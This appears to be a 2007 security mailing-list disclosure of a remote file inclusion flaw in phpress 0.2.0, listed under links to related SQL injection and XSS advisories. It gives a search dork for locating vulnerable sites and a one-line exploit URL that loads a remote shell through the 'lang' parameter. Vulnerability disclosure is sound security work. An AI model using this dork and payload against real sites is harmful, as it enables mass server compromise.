Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

myphotographer image shop script /events/index.asp sql injection

Olate Download 3.4.2~download.php ~ sql injection

Olate Download 3.4. 2~modules/core/fldm. php~comments tag [url] XSS

Olate Download 3.4. 2~modules/core/uim. php~XSS

From:	cerbelum_(at)_gmail.com <cerbelum_(at)_gmail.com>
Date:	23.08.2007
Subject:	phpress 0.2.0 (adisplay.php) Remote File Inclusion

:::::::::::::::::::::::::::::::::::::::::::::::::::.....................
..
::| \ | (_)          | \ | |                       / ____|
::|  \| |_  ___ ___  |  \| | __ _ _ __ ___   ___  | |     _ __  
_____      __
::| . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | |    | '__/ _ \  
\ /\ / /
::| |\  | | (_|  __/ | |\  | (_| | | | | | |  __/ | |____| | |  __/\  
V  V /
::|_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___|  \_____|_|  \___|  
\_/\_/
:::::::::::::::::::::::::::::We got the nicest name in the security  
scene!
::::::::Info::.
::Script: phpress
::Version: 0.2.0
::Homepage:http://sourceforge.net/projects/phpress/
::
:::::::::Details::.
::Type: Remote_File_Inclusion
::Dork: allinurl:/phpress/
::Exploit: http://host/phpress/adisplay.php?lang=shell
::
::
::Variable lang is not defined
::
::::::::::::::::::::::::::::::::.
:::::::::::Additional_Information::.
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
::Contact: cerbelum@gmail.com
::Website: none yet
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.